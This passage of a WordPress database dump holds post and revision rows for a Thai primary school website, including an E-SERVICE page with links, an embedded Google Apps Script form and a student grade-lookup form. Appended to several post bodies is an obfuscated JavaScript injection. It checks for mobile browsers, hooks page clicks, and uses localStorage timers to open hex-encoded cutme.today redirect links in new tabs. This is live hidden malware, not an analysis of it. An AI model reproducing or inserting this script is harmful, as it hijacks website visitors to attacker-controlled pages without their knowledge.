)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว','','inherit','closed','closed','','456-revision-v1','','','2024-08-01 21:02:12','2024-08-01 14:02:12','',456,'http://pakhaeng.ssk.in.th/?p=458',0,'revision','',0),
(459,1,'2024-08-01 21:09:21','2024-08-01 14:09:21','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','publish','closed','closed','','e-service','','','2025-07-07 14:27:16','2025-07-07 07:27:16','',0,'http://pakhaeng.ssk.in.th/?page_id=459',0,'page','',0),
(460,1,'2024-08-01 21:09:21','2024-08-01 14:09:21','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":100} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\"><strong>ระบบดูคะแนน/เกรดนักเรียน</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p>การใช้งาน ให้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>&lt;div align=\'center\'>&lt;form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > &lt;div>&lt;input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' />&lt;/div> &lt;div>&lt;input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required />&lt;button type=\'submit\'>ค้นหา&lt;/button>&lt;/div> &lt;/form>&lt;/div></code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-01 21:09:21','2024-08-01 14:09:21','',459,'http://pakhaeng.ssk.in.th/?p=460',0,'revision','',0),
(461,1,'2024-08-01 21:09:45','2024-08-01 14:09:45','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/0